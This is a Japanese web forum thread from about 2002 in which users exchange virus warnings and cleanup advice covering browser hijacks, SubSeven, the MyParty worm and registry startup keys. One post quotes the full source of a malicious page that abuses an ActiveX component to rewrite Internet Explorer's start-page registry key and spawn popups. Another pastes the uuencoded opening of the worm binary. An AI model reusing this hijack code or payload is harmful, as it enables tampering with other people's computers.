☆ウィルス情報&質問 総合スレッド☆
レス数が1000を超えています。これ以上書き込みはできません。
0001名無しさん@お腹いっぱい。
NGNGIPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
[関連リンク]過去ログ・関連スレ等>>2-10あたり
補足>>1-50
0002名無しさん@お腹いっぱい。
NGNG[ウィルス対策ソフト]
Norton Internet Security2002 Ver.4 http://pc.2ch.net/test/read.cgi/sec/1009681166/l50
ウイルスバスター2002 Part2 http://pc.2ch.net/test/read.cgi/sec/1009212569/l50
マカフィーってだめなの!PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50
がんばれ!!ウイルス警備隊V3 http://pc.2ch.net/test/read.cgi/sec/1005442785/l50
[ウィルス対策ソフト(無料)]
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
0003名無しさん@お腹いっぱい。
NGNG専用スレのリンクよろしくお願いします
「Nimda !! 」【その4】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス http://pc.2ch.net/test/read.cgi/sec/1001662997/l50
Flashムービーに感染するウィルスが登場! http://pc.2ch.net/test/read.cgi/sec/1010564675/l50
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何? http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
0004名無しさん@お腹いっぱい。
NGNG(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/
・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/
0005名無しさん@お腹いっぱい。
NGNG0006名無しさん@お腹いっぱい。
NGNG0007名無しさん@お腹いっぱい。
NGNG0008名無しさん@お腹いっぱい。
NGNG0009名無しさん@お腹いっぱい。
NGNGページ内検索が出来ます
この機能で スレッド一覧や過去ログから
目的の内容を探すと便利です
0010名無しさん@お腹いっぱい。
NGNG0011名無しさん@お腹いっぱい。
NGNG0012名無しさん@お腹いっぱい。
NGNG0013名無しさん@お腹いっぱい。
NGNG0014名無しさん@お腹いっぱい。
NGNG0015名無しさん@お腹いっぱい。
NGNG0016名無しさん@お腹いっぱい。
NGNGでも見つからない
0017
NGNG0019名無しさん@お腹いっぱい。
NGNG0020名無しさん@お腹いっぱい。
NGNG0021名無しさん@お腹いっぱい。
NGNGこのスレのリンクを貼っておいてください
データベースとしても使えるので
0022
NGNG中国(大陸?)からきているようだ。市ね。
0023名無しさん@お腹いっぱい。
NGNGhttp://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
0024名無しさん@お腹いっぱい。
NGNG0025名無しさん@お腹いっぱい。
NGNGウィルス系のスレはみんな平和だと暇
0026名無しさん@お腹いっぱい。
NGNGhttp://pc.2ch.net/test/read.cgi/sec/997783469/l50
0027名無しさん@お腹いっぱい。
NGNG0028(;´Д`)
NGNGこれを踏んでしまったんですが、どうなるんでしょうか?
0030名無しさん@お腹いっぱい。
NGNGIE使っててスクリプトブロックしてなかったら、スタートページが
//www.geocities.com/fes74592/ssopn.html の、concon含んだブラ
クラペーヂになる。んで、ブラウザのオプションは使えなくなるから「ツ
ール」からは直せなくなる。
スクリプトブロックしててもフレームでssopn.html読むからmailtoはよ
んぢゃうけど。
大したもんぢゃないね(´,_ゝ`)プッ
reg値いぢる直し方は、他の人に任せる。。
若しくは、JS.ExceptionでアンチVIRサイト検索して見て。
0033(;´Д`)
NGNGスタートページは変えられてないみたいでしたが。
強制終了した後、PCの動作がすごく遅くなってしまったんですが、
Temporary Internet Fileの「0012.jpg」ファイルを削除したら治りました。
他にもやばい事が起こるんでしょうか?
003430
NGNG良かったね。スクリプトは切ってあったのね?多分。
スクリプト応用されれば色々だろうけど、、、
だからJS.Exceptionも色々種類あるし。。。
>>32
ざっとしかソース見てないのよ。漏れ(w
なんか面白いもの見つかったら書いてあげて下さい。。。
0035>>33
NGNG0036
NGNGどうして貴方がここに来る羽目になったかというと、長い説明が必要に
なります。私は、2年前の12月より、田中康夫長野県政に関するページ
を立ち上げました。それ以前から、田中康夫氏に関して、ちまちま書い
ていたのですが、どうも特定の人々の勘に障ったらしく、選挙期間中に
当方への誹謗中傷スレが立ち上がりました。選挙後、しばらくはなりを
潜めていたのですが、どうやら、いろんな所で恨みを買ったらしく、ま
た、田中知事への不信任案提出が囁かれる昨今のせいか、私をターゲッ
トとした誹謗中傷スレが次々と立ち上がりました。航空・船舶板に「売
れない作家&航空ヲタク「大石英司」を叩け」ニュース速報板に「★作
家がネット上でクラッカーに挑戦状★」(どうやら、クラッカー諸氏に、
私のサイトをクラックしろと唆しているらしい↑)マスコミ板に「★売れ
ない無名三流作家を救え★」タイトルから察するに、この3本は、恐ら
く同一人物が立ち上げたスレと思われます。船舶・航空板にスレが出来
てしばらく後、板違いを根拠に削除を求めましたが、受け入れられませ
んでした。今後とも恐らくは、何の関係もない板に続々とスレが立ち続
けることでしょう。ご迷惑をお掛けしますが、遺憾ながら私には法的措
置を講じる以外の術はありません。(それだって実効性はゼロと言って
良い)たいへん不愉快に思っておりますし、実害も被っておりますが、
不特定多数の顧客を相手にしている以上、ある程度は甘受すべきものと
考えます。残念ながら運営サイドに削除する意思があるとは思えず、し
かしそれは、サーバー上に無用の負担を掛けている以上、運営サイドの
コストであって、幸いにして私のコストではありません。板を移動しつ
つせっせと同様のスレを立ち上げているこの迷惑行為の当人、もしくは
集団が何を意図しているのかは推察するしかありません。私に不愉快な
思いを強いて、田中康夫長野県政への批判を止めさせたいのか(←無駄
なことです)、何処かで私に痛い目に遭わされ、2ちゃんねるという格
好の復讐の場を発見して興奮しているのか。だとしたら、私にはこの人
物の心の平安のために貢献できることは何もありません。ご本人が、某
か復讐に優る人生の関心事を発見してくれることを祈るのみです。
さて私は、貴方がここへ来て、私の本を買ってくれるかも知れないなん
て景気の良いことは考えておりません。しかし、ここに大石英司という
作家がいて、こんなこをやっているということが貴方の脳裏にインプッ
トされるだろうことを、ささやかな喜びとするものです。
0037名無しさん@お腹いっぱい。
NGNG0038醤油
NGNG<head>
<title></title>
</head>
<body onUnload="unload()"><iframe src="ssopn.html">
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>
</APPLET>");
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.geocities.com/fes74592/ssopn.html");
//Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions", "1");
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{setTimeout("f()", 1000);
}init();
</script>
<img src="ok.jpg">
<script>
function unload() {
for(i=1;i<=5;i++){
window.open('ssopn.html')
window.open('index.html')
}}</script>
</body></html>
<noembed><noscript><noscript><noscript><xml>
View-Source:http://www.geocities.com/fes74592/
View-Source:http://www.geocities.com/fes74592/images0012.jpg
View-Source:http://www.geocities.com/fes74592/ssopn.html
http://www.geocities.com/fes74592/ok.jpg
View-Source:http://www.geocities.com/fest7742/
View-Source:http://www.geocities.com/fest7742/images0012.jpg
View-Source:http://www.geocities.com/fest7742/ssopn.html
http://www.geocities.com/fest7742/ok.jpg
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
<META HTTP-EQUIV="Refresh" CONTENT=25;URL="ssopn.html">
0039↑注意注意注意注意注意注意注意!!!!
NGNG0041名無しさん@お腹いっぱい。
NGNG0042名無しさん@お腹いっぱい。
NGNGフリーメールでRe:メールをもらうくらいしか
おきませんね
0043(゜▼゜*)
NGNGIeだけでしたっけ?
0044ガイシュツだったらスマソ
NGNGexeファイルのついたメールが2通きてるんだけど、これってウイルスだよね?
タイトルは化けてて→ !"#%&')*+-/0244689<= と !"#$
sumif.exe と DPLAYSVR.EXE っていうのが添付されてた。
誰か知ってる人いたら教えてください よろしこ
0045名無しさん@お腹いっぱい。
NGNGウイルスかどうか関係無しに、
身に覚えのないメール、身に覚えのない添付ファイル
なら削除すべきでしょうな…。
ちなみに勉強のためなら、そのファイル名を
Googleで検索したら自分でも調べられますよ。
0046名無しさん@お腹いっぱい。
NGNG自分でhtmlファイルの拡張子をjpgにして
ためしてみるといいです
0047名無しさん@お腹いっぱい。
NGNGどこにも公開していないと言いながら読んでいるというと事は、そのメアドを知っている奴がいるということだろ?
なんの不思議も無いと思うが…
0048名無しさん@お腹いっぱい。
NGNGそれってDIONですよね!!
今朝そのメールとしらない人経由のメールがたくさん・・
どうしよう!!
文字化けメールは削除しましたがその後の対応は・・・・
0049名無しさん@お腹いっぱい。
NGNG作成したらしいウイルス、やたら多くない?
0050名無しさん@お腹いっぱい。
NGNGハイブリスのスレってこれ?
KDMEMPKD.EXEってなに?
http://pc.2ch.net/test/read.cgi/sec/1011333304/l50
0051(゜▼゜*)
NGNGはい。
当然Ieでは試したうえで訊いてます。
ブラウザ種類いっぱいありすぎるんで、
他のブラウザの情報を知ってる方に
訊いてるんですけどね。。。
ひょっとしてイジワルで答えてます??
0052名無しさん@お腹いっぱい。
NGNGうちにもいっぱい来てたよ。
0053名無しさん@お腹いっぱい。
NGNGウイルスチェックしてもだめなんですがどうすれば良いのでしょう?
0054名無しさん@お腹いっぱい。
NGNGまさかと思うけどこれじゃないよね。
0055名無しさん@お腹いっぱい。
NGNGすみません、便乗で。
私、それで困ってます。恥ですか?
助けてください!
0056名無しさん@お腹いっぱい。
NGNGそれです!!どうやったら削除できるの?
初級ネット板の下記のスレッドにどうぞ。
対処法もそっちで見てください。
http://pc.2ch.net/test/read.cgi/hack/1011083919/
本当に不用心で、挙げ句の果てにうろたえるヤツが多いなあ。
でもって調べないし。
005856
NGNG感謝
0059おしえて
NGNGいうファイルが1000個もあった。
でウィルススキャンしたら「トロイの木馬」が3匹いて
それらは削除したんだけど、このウィルスっていったい何をするんですか?
0060
NGNGウイルスが広義に使われるようになっているからなあ。
基本的にトロイの木馬っつったら、
内部に入り込んで破壊活動するもの。
神話か歴史か知らないけど、でかい木馬の中に兵隊がひそんで
鉄壁状態の町の中にまんまと入り込んだという故事から。
破壊活動の内容は、プログラムによりさまざま。
ただし、ウイルスのように増殖活動するとは限らない。
(元々は破壊だけして増殖しないものの名称だった。)
ウイルス、ワーム、トロイの木馬などは
用語解説サイト
http://www.e-words.ne.jp/
とかや、アンチウイルスソフトの会社サイト
(Badtransとかのスレにリンクがある)の解説ページで
もちょっと詳しいことや正確なことが分かる。
0061実際でかい木馬がある。
NGNG0062助けて〜
NGNGしたら、青い顔が、出るようになっちゃって
全部削除したんだけど、まだ出るよ〜
心臓に悪いので、だれか教えて?
0063繁体字中国語
NGNG本程式啟動後並不會顯示任何視窗或訊息,但是此時程式已常駐至電腦的記憶體內,
數分鐘後,螢幕上會突然出現一個女鬼的圖片,同時喇叭也會發出驚悚的尖叫聲。
※ 警告:孩童、孕婦、及心臟或精神疾病患者,請勿執行本程式!!!
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/mysoft.html
http://my.vector.co.jp/servlet/System.FileDownload/download/http/0/217070/pack/win95/amuse/joke/hikaru04.zip
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/img/madoka.jpg
006462 何でダウンロードしたん?
NGNG0065助けて〜
NGNG0066おしえて
NGNGどうもです。
いろいろチェックしてみたけど、どこも破壊されてないみたい
なんだけど。
特にもんだいないですか?
0067
NGNGあちこちの板やスレでこればっかりだ、とにもお。
>>66
破壊されてない「みたい」と書かれてもなあ。
とにかく、相手はプログラムなんだから、
どういう活動をするかは作り手の考え方次第。
何か(特定日時、ユーザーの特定アクションなど)をきっかけに
何か(特定ファイルの消去など)をするわけだけど、
ラッキーだったら、
きっかけがなかった、とか、
何かをできなかった(消去対象がWordファイルとかだったら
Word使っていなかったなら何もされないわなあ)とかで、
破壊されないことはあり得る。
まあ、注意して用心しながらやっていってくらはい。
0068おしえて
NGNGということは今後何かのきっかけで、作動する恐れがあるってことですよね。
ウィルススキャンでひっかかった「トロイの木馬」は削除したのに、
何か形をかえて潜んでいるってことですか?
もしそうなら、何をすれば良いんでしょう?
アンチウイルスソフトを最新の状態にして除去したのなら
それ以上どうしようもないでしょ?
データなどのバックアップはしっかりとるとか、
セキュリティに注意して運用していくしかしかたないんじゃ
ないの?
アンラッキーにも破壊が行われていた場合、
見つかり次第修復するっきゃないでしょ?
ラッキーにも破壊が行われておらず、
判別できた限りの「トロイの木馬」を除去できたとしても
もしか、アンチウイルスソフトが対応できていない新種で、
除去される前に何かしていないとはいいきれないわなあ。
「多分大丈夫でしょう」とか書くのは簡単だけど、
そんなの何の保証にもならないんだし。
もうこれ以上質問しても答えられることはないように思うよ、
正直なところ。
0070おしえて
NGNGどうもでした。なにも起こらない事を祈ります。
0071名無しさん@お腹いっぱい。
NGNGまず開かないほうがいい
0072マジレス希望です
NGNG規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 のセキュリティ警告を表示しました
リモートコンピュータ (68.52.197.223、 3274)
2ch見てたら,突然警告音!!! ↑
助けてください
これってヤバイですか???
モウ感染してるのか???
ノートンでウイルススキャンしたら大丈夫そうだったが
マジ教えてくださいすいません
0073名無しさん@お腹いっぱい。
NGNGその前に、思いっきりマルチな君の投稿をなんとかしたまえ。
0074名無しさん@お腹いっぱい。
NGNGってウイルスですか?
なんかたびたび送られてくるんですが
0075名無しさん@お腹いっぱい。
NGNGウィルスです。それも出尽くした感すらある。
0076名無しさん@お腹いっぱい。
NGNGどうぞ。ファイル名は違うけどいっしょです。
http://pc.2ch.net/test/read.cgi/sec/1011333304/l50
0078墓守
NGNG0079名無しさん@お腹いっぱい。
NGNG0080ヘルプ
NGNG前もTRO系に感染し、
表向きは駆除したのですがレジストリをいじらないと完全駆除できなかったので
泣く泣くPC初期化したのですが、復活まで2日もかかったので助けてください。
とりあえず、センター行って情報見てきます。
0081名無しさん@お腹いっぱい。
NGNGたまにはレジストリもいぢってやってください。
0082名無しさん@お腹いっぱい。
NGNG情報下さったみなさんありがとうございました!
0083墓守
NGNGそれって有名だから、ノートンでもバスターでもチェックできるんだけど。何回も感染するのは、怪しくない?近いところに犯人がいるかも。ad-aware使って他のトロイが入っていないか、チェックした方がいいですよ♪
0084ヘルプ
NGNG墓守ad-awareてなんですか?
0085ヘルプ
NGNG0086名無しさん@お腹いっぱい。
NGNG検索できるチャンス
0088名無しさん@お腹いっぱい。
NGNGあれって、起動させるレグ値、色々カスタマイズできなかったっけ??
.ini関係にもhook出来たような。。。
デフォで仕掛けてあったなら別に良いけど。。
0089ヘルプ
NGNGとりあえず落としてきます。
0090名無しさん@お腹いっぱい。
NGNGレジストリぐらいいじってください。
で↓をお気に入りに登録してください
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0091ヘルプ
NGNGいじってみます。
システムエディタでいいんですよね。
0092名無しさん@お腹いっぱい。
NGNGbubu〜〜〜〜
それはsysedit
regeditの方。
0093ヘルプ
NGNGシステムエディタとレジストリて違うんですか?
0094ヘルプ
NGNG0095名無しさん@お腹いっぱい。
NGNGシステムエディタ = お兄さん
レジストリエディタ = 弟
0096ヘルプ
NGNGなるほどね!!
0097墓守
NGNGHKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
0098ヘルプ
NGNG0099名無しさん@お腹いっぱい。
NGNGそれよりサブセブンは駆除できたのかい?
0100名無しさん@お腹いっぱい。
NGNG〜〜\CurrentVersion\RunService
0101ヘルプ
NGNGとりあえずためしてみます。
0102名無しさん@お腹いっぱい。
NGNGAd-awareってSub7鯖が起動用に設定するreg値も検出するの?・・・・
つか、怪しいreg値は取り敢えずみんな検出してくれるのかな。。。
0103ヘルプ
NGNG日本語パッチてないのか探してきます。
0104名無しさん@お腹いっぱい。
NGNG0105sage
NGNGご協力ありがとうございました.
0106ヘルプ
NGNG0107102
NGNGこ、今度、、、暇有ったらSub7鯖使って
ぢ、ぢっけんしてみるぢょ。。。2.2でいいかな
・・・さ、最近バクダン流行ってるし。
も、漏れはこれから、ぢばくマニアだ。。。
みんな、流行に乗り遅れるな!!
0108ヘルプ
NGNGとりあえず大丈夫そうです。
多少不安(検出ウイルスと情報ウイルス名が微妙に違う。)ですが。
0109未知のウイルス
NGNGウイルス250種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(右端の上から6番目)
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
0110通りすがも
NGNG↑このページ250種もある?
2ページ目あわせても205種類しかないと思うんだけれど・・・。
0111名無しさん@お腹いっぱい。
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1010952801/1-10
0112
NGNG0113名無しさん@お腹いっぱい。
NGNGまさか8月のCord Redの悪夢みたいに
新種のウィルスでも暴れ出したとか?
0114名無しさん@お腹いっぱい。
NGNGたったいま正常になった
0115名無しさん@お腹いっぱい。
NGNG漏れが今↓ツール使ってこのスレにものすごい勢いでsage連続カキコしてるからさ。。
ttp://pc.2ch.net/test/read.cgi/sec/995357953
・・・・ぢゃまするなよ。。。。
0116
NGNG0117
NGNG0118名無しさん@お腹いっぱい。
NGNGhttps://www.netsecurity.ne.jp/article/1/3799.html
0119名無しさん@お腹いっぱい。
NGNG0120s
NGNG0121名無しさん@お腹いっぱい。
NGNG自分のとこだけ?
何か新種のウィルス流行って無い?
0122チチカ
NGNGそのうちキャーって叫び声がするウィルスって知ってる人
いますか?友達が感染したみたいで・・・
ウィルスかどうかもまだ分かってないんですけどね。
0123名無しさん@お腹いっぱい。
NGNG0124名無しさん@お腹いっぱい。
NGNG大変だ!新種じゃないのか?
0125チンコ
NGNGhttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_MADO.A
これ↑はやってんの??
0126名無しさん@お腹いっぱい。
NGNG設定画面で「このページでスクリプトエラーが発生しました」と出て
設定が変更できません。
それから再起動したら赤い画面が出て
「ウィルススキャンエンジンのデータベースを初期化できません」と出ます。
Live Updateをしても何も起こりません。
これはどういう事なのでしょうか?
0127墓守
NGNG定義ファイルのアップロードに失敗して、スクリプトエラー表示はあるけど。
「初期化できません」の画面は見たことないですね。
再インストしたら?
HDをはずして、他のPCのスレーブに接続してウイルススキャンするのもオツ。
0128チチカ
NGNG2CHのあるサイトからDLしたものだそうです。
皆さんも気をつけてください。
ウイルス名: TROJ_MODNAR.A
別 名: W32/Modnar@MM, W32.Modnar.Worm@mm, TROJ_DOCPIF.A
ウイルス種類: トロイの木馬型(ワーム)
プラットフォーム: Win9x/Me/NT/2000
暗号化: No
ウイルスサイズ: 180224bytes
初発見日: 2001年7月末
発病条件 1: ファイル実行時
破壊活動 1: メールを自動送信する
0129名無しさん@お腹いっぱい。
NGNGそれトロイだってさ。速報板の方が情報多いかも。
実行すると、外部から侵入し放題になります。
0130名無しさん@お腹いっぱい。
NGNG0131名無しさん@お腹いっぱい。
NGNGhttp://www.google.co.jp/search?q=JS_EXCEPTION.GEN+%83E%83B%83%8B%83X+%8F%EE%95%F1&hl=ja&lr=on&btnG=Google+%8C%9F%8D%F5
0132名無しさん@お腹いっぱい。
NGNGどうもです。あんまり心配しなくてもいいでホッとしました。
0133名無し
NGNGニュース速報板で大問題になってます。
http://choco.2ch.net/test/read.cgi/news/1012065580/
0134
NGNG0135初心者代表
NGNGっていうWindowsバイナリが
uuencodeで添付されてきたひといますか?
Hello!
My party... It was absolutely amazing!
I have attached my web page with new photos!
If you can please make color prints of my photos. Thanks!
begin 666 www.myparty.yahoo.com
M35J0``,````$````__\``+@`````````0```````````````````````````
M````````````````````@`````X?N@X`M`G-(;@!3,TA5&AI<R!P<F]G<F%M
M(&-A;FYO="!B92!R=6X@:6X@1$]3(&UO9&4N#0T*)`````````!010``3`$#
M`)(B4CP``````````.``#P$+`04``'`````0````T```X$P!``#@````4`$`
0136名無しさん@お腹いっぱい。
NGNGうちにも来た。 情報収集中…
0137名無しさん@お腹いっぱい。
NGNG来たよ。
Norton AntiVirusの最新パターンファイルでチェックしても問題
無かったのですが、新種のウイルスでしょうか?
0138名無しさん@お腹いっぱい。
NGNGbegin666ってのが怪しい感じだな・・
↓これも存在しないみたいだし・・
http://www.myparty.yahoo.com/
0139NOTEPAD.EXE
NGNG0140初心者代表
NGNGhttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A
0141こんなんでました
NGNG0142NOTEPAD.EXE
NGNGbegin <mode> <file>
はuuencodeの開始行だよ
0144名無しさん@お腹いっぱい。
NGNGうちも来た。
macafee.com でも検出できず。
0145名無しさん@お腹いっぱい。
NGNG情報公開日: 1 時間, 25 分前
(2002年01月28日 午後 4:29:04 GMT -0800)
できたてほやほや...
0146名無しさん@お腹いっぱい。
NGNGアクセス重いっす。
0147負荷分散
NGNG特徴:
これは、ワームに分類される「トロイの木馬型」不正プログラムで
す。自身のコピーを頒布するワーム活動を行います。
対応方法:
検出方法:
1)最新の検索エンジン・パターンファイルにアップデートしてくださ
い。
2)「手動検索」にてシステム全体を検索してください。
3)検出したファイルを削除してください。
一個のプログラムのため「駆除」できません。検知した場合は、ファ
イルを「削除」してください。
「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場
合、「駆除失敗」となることがあります。その際は、検知したファイル
を「削除」していただければ、問題ありません。
0148負荷分散
NGNGワームを実行すると、自身のコピーファイルを作成し実行します。こ
のファイルは C:\Recycled フォルダに"REGCTRL.EXE"という名称を使用
していることを確認しています。
そして、マシンのレジストリよりデフォルトで使用されている SMTP
サーバの情報、また「Windows のアドレス帳ファイル」よりメールアド
レスの情報を取得します。
これらの情報を取得できた場合には、SMTP サーバを使用して以下の内
容でメール送信を行います。
0149名無しさん@お腹いっぱい。
NGNGありがとう2chよ。。。。今日程有り難いと思ったことはない
0150名無しさん@お腹いっぱい。
NGNGしかも、大量に。
正直、社内に蔓延・・・・・。
わたし、情シス兼ヘルプデスクなんでマジ打つだ。
いままでの、虫なら未定義でも最低でもスキャンに引っかかりはしたのになぁ。
今回は見事にスルーしやがったぁ!!
0151NOTEPAD.EXE
NGNG0152名無しさん@お腹いっぱい。
NGNGhttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A
http://www.nai.com/japan/virusinfo/virM.asp?v=W32/Myparty@MM
http://securityresponse.symantec.com/avcenter/venc/data/w32.myparty@mm.html
0153あ
NGNGじつは,仲根かすみのjpgだったよ
びっくり
0154s
NGNG> シマンテックだけ日本語の情報がないな。
出たけど、まだ空っぽ。
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=27750
0155名無しさん@お腹いっぱい。
NGNG良く言えば慎重?
0156名無しさん@お腹いっぱい。
NGNG>ウィルス名: W32.Myparty@mm
>性質: ワイルド
ワタラ
0157墓守
NGNGトレンドは見つけ次第片っ端から送っているんだけど。
0158名無しさん@お腹いっぱい。
NGNGこれ何ですか?トロイだって貼りまくってるヤツがいるんですが。
0159名無しさん@お腹いっぱい。
NGNGNAVの検疫から送るしかない?
>>158
トロイじゃないよ。
気持ち悪い女の顔が
http://pc.2ch.net/test/read.cgi/sec/1012037926/
0160名無しさん@お腹いっぱい。
NGNG俺もサカ板で踏んだ。
怖い。
0162159
NGNGmadokaとは関係ないです。。
ただの画像と音をフルスクリーンで表示させるホームページ。
0163墓守
NGNGう〜〜〜ん。
検疫から送ろうとしたら、「もう間に合ってます」なんて表示が・・・・・
しかも検疫フォルダに入らなかったものは、無視。
こうやって亜種が見逃されるんですね。
0164名無しさん@お腹いっぱい。
NGNG何を見つけたの??
0165墓守
NGNG0166名無しさん@お腹いっぱい。
NGNGwebmaster@trendmicro.co.jp ←ここではない・・よね?
0167名無しさん@お腹いっぱい。
NGNGウイルスバスターから送るんだが。隔離した後、解析依頼。
フリーで解析してくれるところってあるのだろうか?
とりあえず、バスターはパターン211。
ノートン、マカフィー使っている人もちゃんと更新しましょう。
0168墓守
NGNG最近見つけたのは、ちょっと不明。ポリモかかってる?
>>166
トレンドはここ。一方的に送りつけても、ちゃんと返信してきます。
support@trendmicro.co.jp
0169名無しさん@お腹いっぱい。
NGNGマカフィーの更新は気をつけてやったほうがいいぞ
とりあえず1度は
マカフィーってダメなの!part2
を読んでから実行したほうがいい
0170初心者
NGNGパソコン立ち上げたらメモ帳がひたすら開く、これってウィルスですか?
直し方教えてください
0171闇鍋にケーキは禁止
NGNGスタートアップにNotePadが入っているかと。
スタートを右押し、スタートメニューのプログラムからスタートアップを開く。
ちなみにここに新規のテキストを入れると、面白いよ。
0172名無しさん@お腹いっぱい。
NGNGなんか変なもんでも踏んだ?>>170
0173初心者
NGNGスタートアップからにしたけど直んないよー!助けて!
0174名無しさん@お腹いっぱい。
NGNGそれウイルスじゃないの?メモ帳に寄生するものがあると聞いたことがあるよ。
0176名無しさん@お腹いっぱい。
NGNG「メモ帳」「ウイルス」で検索すると山ほど引っかかる
0177名無しさん@お腹いっぱい。
NGNG感染手段はダブルクリックか? (w
0178名無しさん@お腹いっぱい。
NGNG混乱してスレを立ててしまったんですが、
わかる方、教えてください!
今日yahoonewsで発表されたウイルスは
どういう被害があるんでしょうか?
感染してしまったと思うのですが・・・
まだ症状等含めてよくわからないんです!!
お願いします!
http://pc.2ch.net/test/read.cgi/sec/1012220835/
0179名無しさん@お腹いっぱい。
NGNG0180名無しさん@お腹いっぱい。
NGNG0181名無しさん@お腹いっぱい。
NGNG感染したんなら、もう焦っても仕方ないよ。
ただちに駆除すべきだが、貴方が心配する
貴方の友達への感染メールは既に送信されてるハズ。
0182あっちの5
NGNG0183初心者
NGNG0184ゴルゴ13階段
NGNGなにをダウンロードしていたかは聞かないでください。
それで、完了後にそれをダブルクリックして再生させたところ
WMPが立ち上がって最初の何秒か映し出されたそのとき、
いきなりシャットダウンしてされてしまったんです。
Win2000(管理者じゃないない)でいきなり
シャットダウンなんてさせられるのでしょうか?
そもそも、動画にそんなプログラムを組み込ませられるのでしょうか?
後生ですから教えてください。
0185名無しさん@お腹いっぱい。
NGNG動画であれ、画像であれ地雷を埋め込む事は出来る
立ち上がらないのか?
0186ゴルゴ13
NGNGいえ。後遺症は全くないのですが、ウィン2000で
そんなことされるなんて思ったことも無かったので・・・。
WMPで読み込んでもその地雷は発動しちゃうんでしょうか?
怖くて家ではMXできません。ブルブル
0187名無しさん@お腹いっぱい。
NGNG会社のほうがやばいとおもうが?
0188名無しさん@お腹いっぱい。
NGNG0189ゴルゴ
NGNGなんともいってこないですし。
そんなことよりも、家のマシンが壊れちゃう方がよっぽど
大事です。
0190名無しさん@お腹いっぱい。
NGNG0191ゴルゴ
NGNGMX始めるってのもバカデスよね。
もうACCAに眼をつけられたかも・・。
0192名無しさん@お腹いっぱい。
NGNG0193ゴルゴ
NGNG仕事はしてますって。
0194名無しさん@お腹いっぱい。
NGNGばかすぎる
0196名無しさん@お腹いっぱい。
NGNG逝ってろ!
0197名無しさん@お腹いっぱい。
NGNG今日最新のウイルスって・・・!!
http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
0198名無しさん@お腹いっぱい。
NGNGデリバリーなんたらって言う奴が(送受信するたびに)数十件入ってくるんです。
で、友達の携帯にも数十件の俺のアドレスからのメールがおくられてるらしいんですけど、
これどういうウィルスなんでしょうか?直す方法とかありませんか?
0199名無しさん@お腹いっぱい。
NGNG0200gorugo
NGNG0201名無しさん@おなかいっぱい
NGNG0202名無しさん@お腹いっぱい。
NGNG今朝、早速、2通来たよ
添付ファイル名 www.myparty.yahoo.com
0203名無しさん@お腹いっぱい。
NGNGpartyウイルス。これが2月のBadtransになるか?
0204名無しさん@お腹いっぱい。
NGNG覚えがないので間違いだろうと、登録削除しましたが、
なんか関係あるんでしょうか?
そもそもメアド間違って登録するなんて事、そうあるのかなあと、
妙な気はしたんですが。
そういえば、パスワードだったか登録名だったかが、
ai**-love****-**(*はいちおう当方で伏せ字)なんて
考えたら怪しいですね。
登録者が単に**歳の愛ちゃんって人なのかもしれませんが。(笑
ウィルスチェックには反応しなかったです。
0205名無しさん@お腹いっぱい。
NGNGっていうSubjectで配送できなかったメールを装ってやってくるウイルスが
2通来た。差出人はpostmaster@HOGEHOGE.COMのようにpostmasterを名乗っている。
